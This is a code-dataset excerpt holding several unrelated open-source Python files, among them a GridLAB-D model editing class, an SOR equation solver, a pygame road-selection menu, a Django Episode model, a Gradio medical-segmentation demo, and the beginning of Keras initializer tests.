complex(load.get(f'constant_impedance_{ph}', complex(1))))\n\n # repeat since gridlabd reads constant_power_A as constant_power_AB when delta connected\n for i, ph in enumerate(['A', 'B', 'C']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += np.abs(v_delta[i]) ** 2 / np.conjugate(\n complex(load.get(f'constant_impedance_{ph}', complex(1))))\n print(f'{load_name}:')\n s = s_wye + delta_to_wye @ s_delta\n print(f's: {s}\\n'\n f's_wye: {s_wye},\\n'\n f's_del: {s_delta}')\n s_wye_tot += s_wye\n s_del_tot += s_delta\n name_and_load = [load_name]\n name_and_load.extend(s)\n print(name_and_load)\n simplified_loads.append(name_and_load)\n s_tot = s_wye_tot + delta_to_wye @ s_del_tot\n print(f'Total Load per phase:\\n'\n f'{s_tot}')\n print(f'Total Load:\\n'\n f'{sum(s_tot)}')\n simplified_loads = pd.DataFrame(simplified_loads)\n return simplified_loads\n # ~~~~~~~~~~ Graphing convenience methods ~~~~~~~~~~~~~~~~~~~\n\n def analyze(self):\n graph.analyze(self.model)\n\n def create_graph(self, delete_open=False):\n if delete_open:\n return graph.create_graph(graph.delete_open(self.model))\n else:\n return graph.create_graph(self.model)\n\n def draw_feeders(self, feeder_swing_nodes: list = None, **options):\n return graph.draw_feeders(self.model, feeder_swing_nodes, **options)\n\n def draw(self, **options):\n return graph.draw(self.model, **options)\n # ~~~~~~~~~~ Methods for manipulating the model ~~~~~~~~~~~~~\n def rename_object(self, obj_name: str, new_obj_name: str, obj_type: str = None):\n if obj_type is None:\n obj_type = self.get_object_type(obj_name)\n\n children = self.find_objects_with_property_value('parent', obj_name, prepend_class=True)\n for child in children:\n self.get(child)['parent'] = new_obj_name\n if obj_type in _node_types:\n upstream_links = self.find_objects_with_property_value('to', obj_name, search_types=_link_types,\n prepend_class=True)\n for upstream_link in upstream_links:\n self.get(upstream_link)['to'] = new_obj_name\n downstream_links = self.find_objects_with_property_value('from', obj_name, search_types=_link_types,\n prepend_class=True)\n for downstream_link in downstream_links:\n self.get(downstream_link)['from'] = new_obj_name\n\n configurations = self.find_objects_with_property_value('configuration', obj_name, prepend_class=True)\n for configuration in configurations:\n self.get(configuration)['configuration'] = new_obj_name\n conductor_A_refs = self.find_objects_with_property_value('conductor_A', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_A_refs:\n self.get(ref)['conductor_A'] = new_obj_name\n conductor_B_refs = self.find_objects_with_property_value('conductor_B', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_B_refs:\n self.get(ref)['conductor_B'] = new_obj_name\n conductor_C_refs = self.find_objects_with_property_value('conductor_C', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_C_refs:\n self.get(ref)['conductor_C'] = new_obj_name\n conductor_N_refs = self.find_objects_with_property_value('conductor_N', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_N_refs:\n self.get(ref)['conductor_N'] = new_obj_name\n spacing_refs = self.find_objects_with_property_value('spacing', obj_name, search_types=['line_configuration'],\n prepend_class=True\n )\n for ref in spacing_refs:\n self.get(ref)['spacing'] = new_obj_name\n\n self.add_object(obj_type, new_obj_name, **self.get(obj_name))\n del self.model[obj_type][obj_name]\n\n def remove_quotes_from_obj_names(self):\n \"\"\"\n Use this to remove all quotes from object names and references. They aren't necessary.\n You may want to use this if quotes cause problems for processing.\n \"\"\"\n model = {}\n for obj_class, class_dict in self.model.items():\n model[obj_class] = {}\n for obj_name, obj_dict in class_dict.items():\n model[obj_class][obj_name.strip('\\\"').strip('\\'')] = obj_dict\n self.model = model\n link_types = [\n 'link', 'overhead_line', 'underground_line', 'triplex_line', 'transformer',\n 'regulator', 'fuse', 'switch', 'recloser', 'relay', 'sectionalizer', 'series_reactor'\n ]\n\n # Remove Quotes from references as well\n for link_type in link_types:\n if self.model.get(link_type) is not None:\n for link_name in self.model[link_type].keys():\n if self.model[link_type][link_name].get('from') is not None:\n self.model[link_type][link_name]['from'] = \\\n self.model[link_type][link_name]['from'].strip('\\\"').strip('\\'')\n if self.model[link_type][link_name].get('to') is not None:\n self.model[link_type][link_name]['to'] = \\\n self.model[link_type][link_name]['to'].strip('\\\"').strip('\\'')\n # clean configuration references\n if link_type in ['overhead_line', 'underground_line', 'transformer', 'regulator']:\n if self.model[link_type][link_name].get('configuration') is not None:\n self.model[link_type][link_name]['configuration'] = \\\n self.model[link_type][link_name]['configuration'].strip('\\\"').strip('\\'')\n\n node_types = ['meter', 'node', 'triplex_node', 'triplex_meter', 'load', 'pqload', 'capacitor', 'recorder',\n 'inverter', 'diesel_dg']\n for obj_type in node_types:\n if self.model.get(obj_type) is not None:\n for obj_name in self.model[obj_type].keys():\n if self.model[obj_type][obj_name].get('parent') is not None:\n self.model[obj_type][obj_name]['parent'] = \\\n self.model[obj_type][obj_name]['parent'].strip('\\\"').strip('\\'')\n # remove quotes from all line_configuration properties since they are all links to other objects.\n if self.model.get('line_configuration') is not None:\n for obj_name in self.model['line_configuration'].keys():\n for obj_property in self.model['line_configuration'][obj_name].keys():\n self.model['line_configuration'][obj_name][obj_property] = \\\n self.model['line_configuration'][obj_name][obj_property].strip('\\\"').strip('\\'')\n\n def change_output_dirs(self, new_output_dir):\n \"\"\"\n Modify all the output file paths to have the path provided.\n\n Parameters\n ----------\n new_output_dir: str or Path -- directory to send all output files to.\n \"\"\"\n # filename in voltdump, currdump, impedance_dump\n # file in recorder, collector, group_recorder\n for o_type in ['voltdump', 'currdump', 'impedance_dump']:\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('filename') is not None:\n original_path = Path(self.model[o_type][o_name].get('filename'))\n new_path = Path(new_output_dir) / original_path.name\n self.model[o_type][o_name]['filename'] = new_path\n for o_type in ['recorder', 'collector', 'group_recorder', 'multi_recorder']:\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('file') is not None:\n original_path = Path(self.model[o_type][o_name].get('file'))\n new_path = Path(new_output_dir) / original_path.name\n self.model[o_type][o_name]['file'] = new_path\n\n def change_player_dirs(self, new_player_dir):\n o_type = 'player'\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('file') is not None:\n original_path = Path(self.model[o_type][o_name].get('file'))\n new_path = Path(new_player_dir) / original_path.name\n self.model[o_type][o_name]['file'] = new_path\n\n def add_object(self, obj_type, obj_name, **params):\n \"\"\"\n A convenience function for adding an object to the model. This will overwrite existing objects.\n\n Parameters\n ----------\n obj_type: str -- type of object\n obj_name: str -- name of object\n params: Keyword arguments become parameters of the object.\n Some property names are not allowed as keywords in Python.\n To get around this problem, pass the parameters as a dictionary with ** in front:\n add_object(obj_type, obj_name, **{'from': 'bus_3', 'to': 'bus_4', ...}).\n \"\"\"\n if self.model.get(obj_type) is None:\n self.model[obj_type] = {}\n if self.model[obj_type].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n self.model[obj_type][obj_name] = params\n\n def add_module(self, module_name, **params):\n \"\"\"\n A convenience function for adding a module. If the module already exists it will overwrite existing parameters.\n Parameters\n ----------\n module_name: str -- name of module to add\n params: Keyword arguments become parameters of the module.\n Some property names are not allowed as keywords in Python.\n To get around this problem, pass the parameters as a dictionary with ** in front:\n add_module(obj_type, obj_name, **{property1: prop_val1, ...}).\n \"\"\"\n if self.modules.get(module_name) is None:\n self.modules[module_name] = params\n else:\n warnings.warn(f'Overwriting module, {module_name}, parameters!')\n self.modules[module_name] = params\n\n def require_module(self, module_name, **params):\n \"\"\"\n Will ensure that the module is included. If not it will be added. If it is already included it will do nothing.\n This is similar to add_module but does not overwrite parameters if it already exists\n Parameters\n ----------\n module_name\n params\n\n \"\"\"\n if self.modules.get(module_name) is None:\n self.modules[module_name] = params\n\n def add_helics(self, federate_name, config_path):\n \"\"\"\n Add everything the model needs to enable HELICS use with GridLAB-D\n Parameters\n ----------\n federate_name: str -- name of federate\n config_path: str or Path -- path to HELICS configuration file\n\n Returns\n -------\n\n \"\"\"\n self.require_module('connection')\n self.add_object('helics_msg', federate_name, configure=Path(config_path).as_posix())\n\n def remove_helics(self):\n \"\"\"\n Remove HELICS from model so it can run independently.\n \"\"\"\n if self.model.get('helics_msg') is not None:\n del self.model['helics_msg']\n\n def rename_all_nodes(self, prefix=None):\n if prefix is None:\n prefix = \"n\"\n swing_nodes = self.swing_nodes()\n if len(swing_nodes) != 1:\n warnings.warn(\"This method assumes the model has a single SWING bus.\")\n return\n if len(swing_nodes) == 1:\n root = swing_nodes[0]\n g = self.create_graph(delete_open=True)\n g = graph.fix_reversed_links(g, root)\n node_gen = nx.dfs_preorder_nodes(g, source=root)\n for i, n, in enumerate(node_gen):\n\n new_name = prefix + f\"{i+1}\"\n self.rename_object(n, new_name)\n print(f\"{i+1}: {n}: {new_name}\")\n\n def rename_all_overhead_lines(self, prefix=None):\n\n if prefix is None:\n prefix = \"ohl\"\n lines = [line for line in self.model.get('overhead_line').keys()]\n for line in lines:\n n_from = self.model['overhead_line'][line]['from']\n n_to = self.model['overhead_line'][line]['to']\n new_name = f\"{prefix}_{n_from}_{n_to}\"\n self.rename_object(line, new_name, 'overhead_line')\n\n def rename_all_fuses(self, prefix=None):\n\n if prefix is None:\n prefix = \"fuse\"\n fuses = [fuse for fuse in self.model.get('fuse').keys()]\n for fuse in fuses:\n n_from = self.model['fuse'][fuse]['from']\n n_to = self.model['fuse'][fuse]['to']\n new_name = f\"{prefix}_{n_from}_{n_to}\"\n self.rename_object(fuse, new_name, 'fuse')\n\n def rename_all_loads(self, prefix=None):\n if prefix is None:\n prefix = \"load\"\n loads = [line for line in self.model.get('load').keys()]\n for load in loads:\n parent = self.model['load'][load].get('parent')\n if parent is None:\n warnings.warn(\"Load is not a child object. This method assumes loads have parent nodes.\")\n return\n new_name = f\"{prefix}_{parent}\"\n self.rename_object(load, new_name, 'load')\n\n # TODO: add method for combining GLMs. Duplicate could be optionally deleted or renamed.\n\n # ~~~~~~~~~~ Static Methods ~~~~~~~~~~~~~\n @staticmethod\n def read_csv(filepath, **kwargs):\n \"\"\"\n Read GridLAB-D output csv file into a dataframe. This will automatically choose the appropriate header line.\n Parameters\n ----------\n filepath\n\n \"\"\"\n try:\n df = pd.read_csv(\n filepath,\n sep=',',\n header=1, index_col=0, **kwargs)\n except pd.errors.ParserError:\n df = pd.read_csv(\n filepath,\n sep=',',\n header=8, index_col=0, **kwargs)\n return df\n","repo_name":"nathantgray/glmpy_public","sub_path":"glmpy/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18478888399","text":"input_list = input().split()\ndictionary_groceries = {}\nfor sequence in range(0, len(input_list), 2):\n key = input_list[sequence]\n value = input_list[sequence + 1]\n dictionary_groceries[key] = int(value)\nlooking_list = input().split()\nfor item in looking_list:\n if item in dictionary_groceries:\n print(f\"We have {dictionary_groceries[item]} of {item} left\")\n else:\n print(f\"Sorry, we don't have {item}\")","repo_name":"RadoslavTs/SoftUni-Courses","sub_path":"2. Python Fundamentals/07. Dictionaries/Lab/02. stock.py","file_name":"02. stock.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71592655122","text":"import numpy as np\r\nimport pandas as pd\r\n\r\ndef SOR(A, b, x0, Tol, niter, w):\r\n \"\"\"\r\n Solve a system of equations using the Successive Over-Relaxation (SOR) method using infinite norm to calculate error.\r\n\r\n Parameters:\r\n - A: 2D numpy array, the coefficient matrix.\r\n - b: 2D numpy array, the independent vector.\r\n - x0: 2D numpy array, the initial guess for the solution.\r\n - Tol: float, the tolerance for the solution.\r\n - niter: int, the maximum number of iterations.\r\n - w: float, the relaxation parameter.\r\n\r\n Prints the approximation solution and the intermediate values for the solution.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n n = 0 # Initialize counter\r\n error = Tol + 1 # Initialize error\r\n x = x0.copy()\r\n D = np.diag(np.diag(A)) # Create matrix with diagonal elements of A\r\n L = -np.tril(A, -1) # Lower triangular part of A\r\n U = -np.triu(A, 1) # Upper triangular part of A\r\n\r\n df = pd.DataFrame(columns=['x' + str(i) for i in range(1, len(x0) + 1)] + ['Error'])\r\n\r\n while error > Tol and n < niter:\r\n T = np.linalg.inv(D - w * L) @ ((1 - w) * D + w * U)\r\n C = w * np.linalg.inv(D - w * L) @ b\r\n x1 = T @ x + C\r\n error = np.linalg.norm(x1 - x, np.inf)\r\n itemsol = [item for sublist in x1.tolist() for item in sublist]\r\n itemsol.append(error)\r\n df.loc[n] = itemsol\r\n n += 1\r\n x = x1.copy()\r\n\r\n if error < Tol:\r\n print([item for sublist in x.tolist() for item in sublist], \"is an approximation with a tolerance of\", error)\r\n else:\r\n print(\"Failed within\", n, \"iterations\")\r\n\r\n print(\"The intermediate values for the solution are:\")\r\n print(df)\r\n\r\nA = np.array(([(1/1160)+1, 0, -1/1160, 1/1160],\r\n [1.225*18.5, -1.225*15.165*0.0292*185+1e-6, 0, 0],\r\n [1/1160, 0, 1, -1/1160],\r\n [1, 0, 0, -1-1e-6])) #Define matrix A with syntax = ([a11, a12, a13], [a21, a22, a23], ...)\r\nb = np.array(([300], [5], [185], [133])) #Define matrix b with syntax = ([b11], [b21], [b31])\r\nx0 = np.array(([1], [1], [1], [1])) #Define initial condition with syntax = ([11], [21], [31])\r\n\r\nSOR(A, b, x0, 0.5e-5, 100, 1)\r\n","repo_name":"JCOM127/System-of-Equation-Solvers","sub_path":"SOR.py","file_name":"SOR.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"45260151882","text":"import argparse\r\nimport torch\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\nimport matplotlib.pyplot as plt\r\nfrom google.colab.patches import cv2_imshow\r\nfrom datasets.dataset_polyp import PolypDataset\r\nfrom networks.vit_seg_modeling import CONFIGS as CONFIGS_ViT_seg\r\nfrom networks.vit_seg_modeling import VisionTransformer as ViT_seg\r\nimport gradio as gr\r\n\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\n\r\nparser.add_argument('--img_root', type=str, default='/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Original/', help='root dir for data')\r\nparser.add_argument('--gt_root', type=str, default='/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Ground Truth/', help='root dir for mask')\r\nparser.add_argument('--num_classes', type=int, default=2, help='output channel of network')\r\nparser.add_argument('--max_iterations', type=int,default=20000, help='maximum epoch number to train')\r\nparser.add_argument('--max_epochs', type=int, default=30, help='maximum epoch number to train')\r\nparser.add_argument('--batch_size', type=int, default=16, help='batch_size per gpu')\r\nparser.add_argument('--img_size', type=int, default=224, help='input patch size of network input')\r\nparser.add_argument('--n_skip', type=int, default=3, help='using number of skip-connect, default is num')\r\nparser.add_argument('--vit_name', type=str, default='R50-ViT-B_16', help='select one vit model')\r\nparser.add_argument('--test_save_dir', type=str, default='/content/drive/MyDrive/MyTransunet/TransUNet-repo/predictions', help='saving prediction as nii!')\r\nparser.add_argument('--deterministic', type=int, default=1, help='whether use deterministic training')\r\nparser.add_argument('--base_lr', type=float, default=0.01, help='segmentation network learning rate')\r\nparser.add_argument('--seed', type=int, default=1234, help='random seed')\r\nparser.add_argument('--vit_patches_size', type=int, default=16, help='vit_patches_size, default is 16')\r\nargs = parser.parse_args()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Define the preprocessing transforms\r\n preprocess = transforms.Compose([\r\n transforms.RandomRotation(90, expand=False, center=None, fill=None),\r\n transforms.RandomVerticalFlip(p=0.5),\r\n transforms.RandomHorizontalFlip(p=0.5),\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n\r\n trnsfrm = transforms.Compose([\r\n transforms.Resize((224, 224)),\r\n transforms.ToTensor(),\r\n ])\r\n\r\n\r\n def predict(image_type, image):\r\n dataset_config = {\r\n 'Polyp': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Original/',\r\n 'gt_root': '/content/drive/MyDrive/MyBScProject/project_TransUNet/data/Polyp/Ground Truth/',\r\n },\r\n 'Kvasir': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/Kvasir-SEG/images/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/Kvasir-SEG/masks/',\r\n },\r\n 'Ph2': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/ph2/trainx/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/ph2/trainy/',\r\n },\r\n 'CVCKvasir': {\r\n 'Dataset': PolypDataset,\r\n 'num_classes': 2,\r\n 'img_root': '/content/drive/MyDrive/datasets/CVC-Kvasir/images/',\r\n 'gt_root': '/content/drive/MyDrive/datasets/CVC-Kvasir/masks/'\r\n },\r\n }\r\n\r\n dataset_name = ('CVCKvasir' if image_type == 'Polyp' else 'Ph2')\r\n\r\n args.num_classes = dataset_config[dataset_name]['num_classes']\r\n args.Dataset = dataset_config[dataset_name]['Dataset']\r\n args.img_root = dataset_config[dataset_name]['img_root']\r\n args.gt_root = dataset_config[dataset_name]['gt_root']\r\n args.is_pretrain = True\r\n\r\n config_vit = CONFIGS_ViT_seg[args.vit_name]\r\n config_vit.n_classes = args.num_classes\r\n config_vit.n_skip = args.n_skip\r\n config_vit.patches.size = (args.vit_patches_size, args.vit_patches_size)\r\n if args.vit_name.find('R50') !=-1:\r\n config_vit.patches.grid = (int(args.img_size/args.vit_patches_size), int(args.img_size/args.vit_patches_size))\r\n \r\n net = ViT_seg(config_vit, img_size=args.img_size, num_classes=config_vit.n_classes)\r\n\r\n if dataset_name == 'Polyp':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Polyp224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n elif dataset_name == 'Kvasir':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Kvasir224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n elif dataset_name == 'Ph2':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_Ph2224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n \r\n elif dataset_name == 'CVCKvasir':\r\n snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TU_CVCKvasir224/TU_pretrain_R50-ViT-B_16_skip3_epo150_bs16_224/epoch_149.pth'\r\n # snapshot = '/content/drive/MyDrive/MyTransunet/TransUNet-repo/model/TransCASCADE_Ph2224/TransCASCADE_pretrain_R50-ViT-B_16_skip3_epo150_bs16_lr0.0001_224/epoch_149.pth'\r\n net.load_state_dict(torch.load(snapshot))\r\n\r\n image = Image.fromarray(image)\r\n _image = trnsfrm(image) # tensor\r\n _image = _image.unsqueeze(0) # ([1, 3, 224, 224])\r\n with torch.no_grad():\r\n prediction = torch.argmax(torch.softmax(net(_image), dim=1), dim=1)\r\n mask = prediction.squeeze().numpy()\r\n mask = Image.fromarray((mask * 255).astype(np.uint8))\r\n return mask\r\n\r\n\r\n inputs = gr.inputs.Image()\r\n outputs = gr.outputs.Image(type='pil').style(width=224, height=224, margin='auto')\r\n gr.Interface(fn=predict, \r\n inputs=[\r\n gr.Radio([\"Polyp\", \"Skin lesion\"], label=\"Image Type\", info=\"Choose type of medical image\"), # change 'Skin' to 'Skin Lesion', 'Datasets' to 'Image Type'\r\n inputs,\r\n ], \r\n outputs=outputs,\r\n flagging_options=[\"correct ✅\", \"incorrect ❌\", \"other\"],\r\n capture_session=True,\r\n examples=[\r\n # ['Skin lesion', os.path.join(os.path.abspath(''), \"/content/drive/MyDrive/datasets/ph2/trainx/X_img_0.bmp\")],\r\n ['Skin lesion', os.path.abspath(\"/content/drive/MyDrive/MyTransunet/TransUNet-repo/TransUNet/gradio-examples/Ph2/X_img_53.bmp\")],\r\n ['Polyp', os.path.abspath('/content/drive/MyDrive/MyTransunet/TransUNet-repo/TransUNet/gradio-examples/EndoScene/images/123.png')],\r\n ], \r\n title='Medical Image Segmentation System (MISS)',\r\n description='This is image segmentation system for medical images of polyps and skin lesions. This app is implemented by `@Mahdi_Niknejad`'\r\n ).launch(share=True, debug=True)","repo_name":"mnn59/BSc","sub_path":"gradio_test.py","file_name":"gradio_test.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41255578382","text":"import json\nimport logging\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport click\nfrom tqdm import tqdm\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.argument(\"dataset-file\")\n@click.option(\"--verbose\", is_flag=True)\ndef main(\n dataset_file: str,\n verbose: bool,\n):\n if verbose:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.INFO)\n dataset_file = Path(dataset_file)\n with dataset_file.open(\"r\") as f:\n tasks = json.load(f)\n\n image_to_tasks = defaultdict(list)\n for task in tqdm(tasks):\n image_to_tasks[task[\"image\"]].append(task[\"annotation_id\"])\n\n duplicates = [(k, v) for k, v in image_to_tasks.items() if len(v) > 1]\n print(\"image url: num duplicates - annotation ids\")\n for duplicate in duplicates:\n print(f\"{duplicate[0]}: {len(duplicate[1])} - {duplicate[1]}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"akucia/analog-watch-recognition","sub_path":"scripts/find-duplicated-images.py","file_name":"find-duplicated-images.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"70433714642","text":"import os\nimport pygame\nfrom button import Button\nfrom clickable_image import ClickableImage\n\n\nclass Road_select:\n def __init__(self, surface, menu, login):\n self.surface = surface\n self.menu = menu\n self.choosen = 4\n self.choosen_road = 0\n self.path = '\\\\'.join(os.getcwd().split('\\\\')[:-1]) + '\\\\menu_and_game\\\\'\n self.login = login\n self.roads = ['road', 'road_v2', 'road_v3', 'ice_road']\n self.images = self.load_images()\n self.buttons = self.load_buttons()\n\n def load_images(self):\n images = []\n x, y = 100, 40\n for elem in self.roads:\n image = ClickableImage(x, y, elem, self.surface)\n images.append(image)\n if x < 600:\n x += 250\n else:\n y += 270\n x = 100\n return images\n\n def load_buttons(self):\n x, y = self.surface.get_width() // 3 - 135, 210\n buttons = []\n for i in range(len(self.roads)):\n if i != self.choosen:\n i = Button(x - 25, y + 5, 80, 30, 'Выбрать', self.surface,\n (66, 245, 206),\n (0, 0, 0), (227, 66, 245), 0, 25, self.choose)\n else:\n i = Button(x - 25, y + 5, 80, 30, 'Выбрано', self.surface,\n (66, 245, 206),\n (0, 0, 0), (227, 66, 245), 0, 25, self.choose)\n buttons.append(i)\n if x < 600:\n x += 250\n else:\n y += 270\n x = 135\n buttons.append(\n Button(106, 650, 80, 30, 'Выбрать', self.surface, (66, 245, 206),\n (0, 0, 0), (227, 100, 245), 0, 25, self.choose))\n return buttons\n\n def change_text(self):\n for i in range(len(self.buttons)):\n if i != self.choosen:\n self.buttons[i].set_text('Выбрать')\n else:\n self.buttons[i].set_text('Выбрано')\n\n def choose(self):\n if self.choosen == 4:\n self.choosen_road = 0\n else:\n self.choosen_road = pygame.transform.scale(\n self.images[self.choosen].orig_image, (800, 800))\n\n def check_mouse_motion(self, pos):\n for btn in self.buttons:\n btn.check_mouse_motion(pos)\n\n def check_mouse_down(self, pos):\n for btn in self.buttons:\n btn.check_mouse_down(pos)\n if btn.state == 'pressed':\n self.choosen = self.buttons.index(btn)\n for img in self.images:\n img.check_mouse_down(pos)\n\n def check_mouse_up(self):\n for btn in self.buttons:\n btn.check_mouse_up()\n\n def quit(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE and self.menu.in_roads:\n self.menu.in_roads = False\n return True\n\n def render(self):\n for i in self.images:\n i.render()\n for btn in self.buttons:\n btn.render()\n font = pygame.font.SysFont('Montserrat', 50)\n text = font.render(f'Случайная дорога', True, (0, 106, 98))\n self.surface.blit(text, (65, 600))\n self.change_text()\n","repo_name":"code-n-cry/pyrace","sub_path":"menu_and_game/road_select.py","file_name":"road_select.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13930698353","text":"from django.conf import settings\nfrom django.db import models\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import gettext_lazy as _\nfrom taggit.managers import TaggableManager\n\nfrom libs.base_model import BaseModel\n\nfrom ..querysets import EpisodeQuerySet\n\n\nclass Episode(BaseModel):\n objects = EpisodeQuerySet.as_manager()\n\n tags = TaggableManager()\n\n id = models.AutoField(primary_key=True)\n student = models.ForeignKey(\n \"Student\",\n verbose_name=_(\"Student for the episode\"),\n on_delete=models.CASCADE,\n )\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"Educator that created the episode\"),\n on_delete=models.CASCADE,\n )\n title = models.CharField(max_length=255, verbose_name=_(\"Title\"))\n description = models.TextField(verbose_name=_(\"Description\"))\n description_html = models.TextField(\n verbose_name=_(\"HTML Description of the episode\"),\n null=True,\n blank=True,\n )\n description_ids = models.TextField(\n verbose_name=_(\"HTML Description IDS of the episode\"),\n null=True,\n blank=True,\n )\n transcript_html = models.TextField(\n verbose_name=_(\"HTML Transcript of the episode\"), null=True, blank=True\n )\n transcript = models.TextField(\n verbose_name=_(\"Transcript\"), null=True, blank=True\n )\n transcript_ids = models.TextField(\n verbose_name=_(\"HTML Transcript IDS of the episode\"),\n null=True,\n blank=True,\n )\n is_active = models.BooleanField(default=True)\n date = models.DateTimeField()\n full = models.BooleanField(\n verbose_name=_(\"Fully entered in grid\"), default=False\n )\n landmark = models.BooleanField(\n verbose_name=_(\"landmark episode\"), default=False\n )\n\n # later on heads_up should be remove, heads_up_json name should be changed\n heads_up = models.TextField(\n verbose_name=_(\"Heads Up\"), null=True, blank=True\n )\n heads_up_json = models.JSONField(verbose_name=_(\"Heads Up\"), null=True)\n\n practitioner = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"Educator that contributed the episode\"),\n null=True,\n on_delete=models.SET_NULL,\n related_name=\"contributed_episodes\",\n )\n\n @cached_property\n def writers(self):\n examples = self.example_set.all()\n\n added_bys = set([example.added_by for example in examples])\n\n return list(added_bys)\n\n @cached_property\n def contributors(self):\n added_bys = self.writers\n\n return added_bys\n","repo_name":"stanislavpol00/education","sub_path":"main/models/episode.py","file_name":"episode.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72063088402","text":"from tkinter import *\n\nif __name__=='__main__':\n print('in')\n win=Tk()\n win.title('Learn Tk Button')\n win.geometry('500x500+200+50')\n btn1=Button(win,\n text='退出',\n width=20,\n height=5,\n command=win.quit\n )\n btn1.pack()\n \n def event_enter(event):\n print('enter:'.format(event.x,event.y))\n def event_leave(event):\n print('leave:'.format(event.x,event.y))\n def event_double_click(event):\n print('double_click:'.format(event.x,event.y))\n def func():\n print('欢迎')\n \n btn2=Button(win,\n text='点我有惊喜',\n width=40,\n height=5,\n command=func\n )\n btn2.bind('',event_double_click)\n btn2.bind('',event_leave)\n btn2.bind('',event_leave)\n btn2.pack()\n \n print('exit')\n mainloop()\n # win.mainloop()","repo_name":"caldz/python","sub_path":"practice/tkinter_test/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"71784395922","text":"import pytest\nimport numpy as np\n\nfrom keras import initializers\nfrom keras import backend as K\n\n# 2D tensor test fixture\nFC_SHAPE = (200, 100)\n\n# 4D convolution in th order. This shape has the same effective shape as FC_SHAPE\nCONV_SHAPE = (25, 25, 20, 20)\n\n\ndef _runner(init, shape, target_mean=None, target_std=None,\n target_max=None, target_min=None):\n variable = K.variable(init(shape))\n output = K.get_value(variable)\n lim = 3e-2\n if target_std is not None:\n assert abs(output.std() - target_std) < lim\n if target_mean is not None:\n assert abs(output.mean() - target_mean) < lim\n if target_max is not None:\n assert abs(output.max() - target_max) < lim\n if target_min is not None:\n assert abs(output.min() - target_min) < lim\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_uniform(tensor_shape):\n _runner(initializers.RandomUniform(minval=-1, maxval=1), tensor_shape,\n target_mean=0., target_max=1, target_min=-1)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_normal(tensor_shape):\n _runner(initializers.RandomNormal(mean=0, stddev=1), tensor_shape,\n 